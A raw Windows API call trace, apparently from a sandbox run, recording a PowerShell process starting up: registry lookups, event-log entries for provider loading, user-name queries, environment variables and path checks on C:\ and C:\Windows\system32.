	[0301.324] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.324] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x3a0) returned 0x0
	[0301.324] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.324] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x3a4) returned 0x0
	[0301.325] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.325] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x3a8) returned 0x0
	[0301.325] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.325] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x3ac) returned 0x0
	[0301.325] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x3b0) returned 0x0
	[0301.325] RegCloseKey (hKey=0x3b0) returned 0x0
	[0301.325] RegCloseKey (hKey=0x38c) returned 0x0
	[0301.325] RegCloseKey (hKey=0x3ac) returned 0x0
	[0301.328] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba30008
	[0301.630] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3fc40*="WSMan", lpRawData=0x2f3f9b0) returned 1
	[0301.632] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.632] CoTaskMemFree (pv=0x246570) 
	[0301.632] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0301.632] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0301.633] CoTaskMemFree (pv=0x1b84f080) 
	[0301.633] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.633] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0301.633] CoTaskMemFree (pv=0x292480) 
	[0301.633] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f45178*="Alias", lpRawData=0x2f44f08) returned 1
	[0301.633] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.634] CoTaskMemFree (pv=0x246570) 
	[0301.634] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0301.634] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0301.635] CoTaskMemFree (pv=0x1b84f080) 
	[0301.635] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.635] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0301.635] CoTaskMemFree (pv=0x292480) 
	[0301.635] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4a770*="Environment", lpRawData=0x2f4a500) returned 1
	[0301.635] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.635] CoTaskMemFree (pv=0x246570) 
	[0301.636] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.636] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0301.636] CoTaskMemFree (pv=0x246570) 
	[0301.636] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.636] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0301.636] CoTaskMemFree (pv=0x246570) 
	[0301.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0301.636] SetErrorMode (uMode=0x1) returned 0x1
	[0301.636] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd5e0 | out: lpFileInformation=0x1cd5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0301.636] SetErrorMode (uMode=0x1) returned 0x1
	[0301.637] GetLogicalDrives () returned 0x4
	[0301.637] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0301.638] SetErrorMode (uMode=0x1) returned 0x1
	[0301.638] CoTaskMemAlloc (cb=0x68) returned 0x1b830d60
	[0301.638] CoTaskMemAlloc (cb=0x68) returned 0x1b830970
	[0301.638] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b830d60, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd5b0, lpMaximumComponentLength=0x1cd5ac, lpFileSystemFlags=0x1cd5a8, lpFileSystemNameBuffer=0x1b830970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd5b0*=0x9c354b42, lpMaximumComponentLength=0x1cd5ac*=0xff, lpFileSystemFlags=0x1cd5a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0301.638] CoTaskMemFree (pv=0x1b830d60) 
	[0301.638] CoTaskMemFree (pv=0x1b830970) 
	[0301.638] SetErrorMode (uMode=0x1) returned 0x1
	[0301.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0301.639] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.639] SetErrorMode (uMode=0x1) returned 0x1
	[0301.639] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0301.639] SetErrorMode (uMode=0x1) returned 0x1
	[0301.639] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.639] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.639] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0301.639] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.640] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0301.640] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.640] SetErrorMode (uMode=0x1) returned 0x1
	[0301.640] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd380 | out: lpFileInformation=0x1cd380*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0301.640] SetErrorMode (uMode=0x1) returned 0x1
	[0301.640] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.640] SetErrorMode (uMode=0x1) returned 0x1
	[0301.640] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd380 | out: lpFileInformation=0x1cd380*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0301.640] SetErrorMode (uMode=0x1) returned 0x1
	[0301.641] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0301.641] SetErrorMode (uMode=0x1) returned 0x1
	[0301.641] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd420 | out: lpFileInformation=0x1cd420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0301.641] SetErrorMode (uMode=0x1) returned 0x1
	[0301.641] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0301.641] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0301.641] CoTaskMemFree (pv=0x1b84f080) 
	[0301.641] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.641] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0301.642] CoTaskMemFree (pv=0x292480) 
	[0301.642] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f51860*="FileSystem", lpRawData=0x2f515f0) returned 1
	[0301.642] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.642] CoTaskMemFree (pv=0x246570) 
	[0301.643] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0301.643] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0301.643] CoTaskMemFree (pv=0x1b84f080) 
	[0301.643] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.643] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0301.643] CoTaskMemFree (pv=0x292480) 
	[0301.643] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f570a0*="Function", lpRawData=0x2f56e30) returned 1
	[0301.644] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0301.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.644] CoTaskMemFree (pv=0x246570) 
	[0302.398] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0302.398] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0302.399] CoTaskMemFree (pv=0x1b84f080) 
	[0302.399] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0302.399] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0302.399] CoTaskMemFree (pv=0x292480) 
	[0302.399] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f798c8*="Registry", lpRawData=0x2f79658) returned 1
	[0302.840] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0302.840] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0302.840] CoTaskMemFree (pv=0x1b84f080) 
	[0302.840] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0302.840] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0302.841] CoTaskMemFree (pv=0x292480) 
	[0302.841] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f7ece0*="Variable", lpRawData=0x2f7ea70) returned 1
	[0302.841] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0302.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.841] CoTaskMemFree (pv=0x246570) 
	[0302.842] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0302.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.842] CoTaskMemFree (pv=0x246570) 
	[0302.860] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0302.860] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0302.860] CoTaskMemFree (pv=0x1b84f080) 
	[0302.860] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0302.860] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0302.861] CoTaskMemFree (pv=0x292480) 
	[0302.861] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f928f8*="Certificate", lpRawData=0x2f92688) returned 1
	[0302.865] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0302.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.865] CoTaskMemFree (pv=0x246570) 
	[0302.866] CoTaskMemAlloc (cb=0x20e) returned 0x2ddc90
	[0302.866] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ddc90 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0302.866] CoTaskMemFree (pv=0x2ddc90) 
	[0302.867] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0302.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.867] CoTaskMemFree (pv=0x246570) 
	[0302.868] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0302.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.868] CoTaskMemFree (pv=0x246570) 
	[0303.970] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0303.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.970] CoTaskMemFree (pv=0x246570) 
	[0303.974] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0303.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.974] CoTaskMemFree (pv=0x246570) 
	[0303.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.975] SetErrorMode (uMode=0x1) returned 0x1
	[0303.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.975] SetErrorMode (uMode=0x1) returned 0x1
	[0303.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.976] SetErrorMode (uMode=0x1) returned 0x1
	[0303.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd470 | out: lpFileInformation=0x1cd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.976] SetErrorMode (uMode=0x1) returned 0x1
	[0303.977] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0303.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.977] CoTaskMemFree (pv=0x246570) 
	[0303.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.985] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0303.985] SetErrorMode (uMode=0x1) returned 0x1
	[0303.985] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0303.985] SetErrorMode (uMode=0x1) returned 0x1
	[0303.986] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0303.986] SetErrorMode (uMode=0x1) returned 0x1
	[0303.986] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0303.986] SetErrorMode (uMode=0x1) returned 0x1
	[0303.986] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0303.986] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0303.986] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.986] SetErrorMode (uMode=0x1) returned 0x1
	[0303.987] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0303.987] SetErrorMode (uMode=0x1) returned 0x1
	[0303.987] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.987] SetErrorMode (uMode=0x1) returned 0x1
	[0303.987] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0303.987] SetErrorMode (uMode=0x1) returned 0x1
	[0303.987] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.987] SetErrorMode (uMode=0x1) returned 0x1
	[0303.987] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.988] SetErrorMode (uMode=0x1) returned 0x1
	[0303.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.988] SetErrorMode (uMode=0x1) returned 0x1
	[0303.988] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0303.988] SetErrorMode (uMode=0x1) returned 0x1
	[0303.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0303.988] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0303.988] SetErrorMode (uMode=0x1) returned 0x1
